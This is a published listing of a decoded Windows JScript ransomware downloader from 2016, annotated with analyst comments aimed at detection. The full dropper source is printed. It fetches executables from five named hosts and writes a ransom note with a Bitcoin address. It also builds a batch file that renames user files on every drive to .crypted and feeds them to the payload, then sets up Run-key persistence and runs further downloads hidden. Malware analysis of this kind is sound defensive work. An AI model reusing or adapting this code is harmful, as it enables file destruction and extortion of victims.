guelfoweb

JS Ransomware Downloader - Decoded

Mar 21st, 2016
  1. // js_ransomware_downloader_decode.py -> https://gist.github.com/guelfoweb/2ee5ac10c42132674bd6
// Analyst notes (defensive): this is a decoded Windows Script Host JScript dropper. The outer
// "('eval', )((" ... "', ))" wrapper is the decoder's Python tuple output, not part of the script.
// The listing is kept exactly as decoded (including two calls whose arguments are split across
// lines). The comments below map observable behaviour to the lines that produce it, to support
// triage and detection; nothing here is intended to be run.
  2.  
// id: token appended to the stage-2 request query ("?id=...&rnd=...", line 95).
  3. ('eval', )(('var id = "a5MDyaa6RhRlNZSiV2EZfo_xMgx2viIpDJCLPKkOHEAhoWsDIgmisPaqo4qM8sFGwBy8weZ4uw8ZMBvT2FpUxX2tzQ";
// ad: Bitcoin address; sent in the stage-1 request query (line 19) and printed in the ransom note (lines 58, 63).
  4. var ad = "1BPRvxWw75kyZAjTS1UYqDmyCzvRH4eHSc";
// bc: ransom amount in BTC quoted in the note (lines 45, 52, 56).
  5. var bc = "0.60340";
// ld: index of the first host that answered; later loops resume from it.
  6. var ld = 0;
// cq / cs: double-quote and backslash characters, used to assemble quoted paths and the .cmd lines.
  7. var cq = String.fromCharCode(34);
  8. var cs = String.fromCharCode(92);
// ll: the five hosts contacted over plain HTTP for both download stages (network IoCs).
  9. var ll = "bibliotecaatualiza.com.br web.goodworkint.com angelucci.info catteau.francois.perso.neuf.fr kandiramyo.kocaeli.edu.tr".split(" ");
  10. var ws = WScript.CreateObject("WScript.Shell");
// fn: %TEMP%\216983 — base path shared by every dropped artefact (.txt, .exe, .cmd, 1.exe, 2.exe). Host IoC.
  11. var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "216983";
// MSXML2.XMLHTTP for the download, ADODB.Stream to write the binary body, FileSystemObject for the drops.
  12. var xo = WScript.CreateObject("MSXML2.XMLHTTP");
  13. var xa = WScript.CreateObject("ADODB.Stream");
  14. var fo = WScript.CreateObject("Scripting.FileSystemObject");
// The ransom-note file doubles as a "has run" marker: everything below is skipped if it already exists.
  15. if (!fo.FileExists(fn + ".txt")) {
// Stage 1: try each host in order; the first response body larger than 1000 bytes is saved as fn.exe
// and the loop stops. Errors (including unreachable hosts) are swallowed by the empty catch on line 37.
  16.    for (var i = ld; i < ll.length; i++) {
  17.        var dn = 0;
  18.        try {
// As decoded: the open() arguments are split across two lines; kept verbatim.
  19.            xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&dc=753123"
  20.                false);
  21.            xo.send();
  22.            if (xo.status == 200) {
  23.                xa.open();
  24.                xa.type = 1;
  25.                xa.write(xo.responseBody);
  26.                if (xa.size > 1000) {
  27.                    dn = 1;
  28.                    xa.position = 0;
  29.                    xa.saveToFile(fn + ".exe", 2);
  30.                };
  31.                xa.close();
  32.            };
  33.            if (dn == 1) {
  34.                ld = i;
  35.                break;
  36.            };
  37.        } catch (er) {};
  38.    };
// Stage 1 payload on disk: write the ransom note (.txt), then a batch file (.cmd), then run the .cmd
// with a hidden window (line 89). The note text is static apart from bc, ad and the host list.
  39.    if (fo.FileExists(fn + ".exe")) {
  40.        fp = fo.CreateTextFile(fn + ".txt", true);
  41.        fp.WriteLine("ATTENTION!");
  42.        fp.WriteLine("");
  43.        fp.WriteLine("All your documents, photos, databases and other important personal files");
  44.        fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
  45.        fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins).");
  46.        fp.WriteLine("Please follow this manual:");
  47.        fp.WriteLine("");
  48.        fp.WriteLine("1. Create Bitcoin wallet here:");
  49.        fp.WriteLine("");
  50.        fp.WriteLine("      https://blockchain.info/wallet/new");
  51.        fp.WriteLine("");
  52.        fp.WriteLine("2. Buy " + bc + " BTC with cash using search here:");
  53.        fp.WriteLine("");
  54.        fp.WriteLine("      https://localbitcoins.com/buy_bitcoins");
  55.        fp.WriteLine("");
  56.        fp.WriteLine("3. Send " + bc + " BTC to this Bitcoin address:");
  57.        fp.WriteLine("");
  58.        fp.WriteLine("      " + ad);
  59.        fp.WriteLine("");
  60.        fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
  61.        fp.WriteLine("");
// The same hosts used for download are advertised to the victim as "decryptor" links.
  62.        for (var i = 0; i < ll.length; i++) {
  63.            fp.WriteLine("      http://" + ll[i] + "/counter/?ad=" + ad);
  64.        };
  65.        fp.WriteLine("");
  66.        fp.WriteLine("5. Run decryptor to restore your files.");
  67.        fp.WriteLine("");
  68.        fp.WriteLine("PLEASE REMEMBER:");
  69.        fp.WriteLine("");
  70.        fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
  71.        fp.WriteLine("      - Nobody can help you except us.");
  72.        fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc.");
  73.        fp.WriteLine("      - Your files can be decrypted only after you make payment.");
  74.        fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt).");
  75.        fp.Close();
// .cmd contents, part 1: for each drive letter C..Z (char codes 67..90), enumerate the listed
// extensions recursively, rename every match to "<name>.crypted" and pass it to fn.exe.
// Detection angle: cmd.exe launched by wscript.exe from %TEMP%, followed by mass REN to *.crypted.
  76.        fp = fo.CreateTextFile(fn + ".cmd", true);
  77.        for (var i = 67; i <= 90; i++) {
  78.            fp.WriteLine("dir /B " + cq + String.fromCharCode(i) + ":" + cs + cq + " && for /r " + cq + String.fromCharCode(i) + ":" + cs + cq + " %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN " + cq + "%%i" + cq + " " + cq + "%%~nxi.crypted" + cq + " & call " + fn + ".exe " + cq + "%%i.crypted" + cq + ")");
  79.        };
// .cmd contents, part 2 — persistence and clean-up, all useful detection points:
//   line 80: HKCU\...\CurrentVersion\Run value "Crypted" pointing at the note, so it opens at logon;
//   lines 81-82: HKCR association for the .crypted extension -> notepad.exe with the note;
//   lines 83-84: note copied to the Desktop as DECRYPT.txt (two candidate profile paths);
//   lines 85-86: the downloaded fn.exe is overwritten with the note text and then deleted,
//                so the original binary is not left on disk for recovery;
//   line 87: the .cmd deletes itself and opens the note in notepad.
  80.        fp.WriteLine("REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq);
  81.        fp.WriteLine("REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq);
  82.        fp.WriteLine("REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq);
  83.        fp.WriteLine("copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq);
  84.        fp.WriteLine("copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq);
  85.        fp.WriteLine("copy /y " + cq + fn + ".txt" + cq + " " + cq + fn + ".exe" + cq);
  86.        fp.WriteLine("del " + cq + fn + ".exe" + cq);
  87.        fp.WriteLine("del " + cq + fn + ".cmd" + cq + " & notepad.exe " + cq + fn + ".txt" + cq);
  88.        fp.Close();
// Run the batch file with window style 0 (hidden) and without waiting for it to finish.
  89.        ws.Run(fn + ".cmd", 0, 0);
  90.    };
// Stage 2: two further downloads ("?id=" + id + "&rnd=321683" + n), each saved as fn<n>.exe and
// executed immediately (lines 104-107). Same host list and same >1000-byte size check as stage 1.
  91.    for (var n = 1; n <= 2; n++) {
  92.        for (var i = ld; i < ll.length; i++) {
  93.            var dn = 0;
  94.            try {
  95.                xo.open("GET", "http://" + ll[i] + "/counter/?id=" + id + "&rnd=321683" + n, false);
  96.                xo.send();
  97.                if (xo.status == 200) {
  98.                    xa.open();
  99.                    xa.type = 1;
  100.                    xa.write(xo.responseBody);
  101.                    if (xa.size > 1000) {
  102.                        dn = 1;
  103.                        xa.position = 0;
  104.                        xa.saveToFile(fn + n + ".exe", 2);
  105.                        try {
// As decoded: the Run() arguments are split across two lines; kept verbatim.
  106.                            ws.Run(fn + n + ".exe"
  107.                                1, 0);
  108.                        } catch (er) {};
  109.                    };
  110.                    xa.close();
  111.                };
  112.                if (dn == 1) {
  113.                    ld = i;
  114.                    break;
  115.                };
  116.            } catch (er) {};
  117.        };
  118.    };
  119. };
  120. ', ))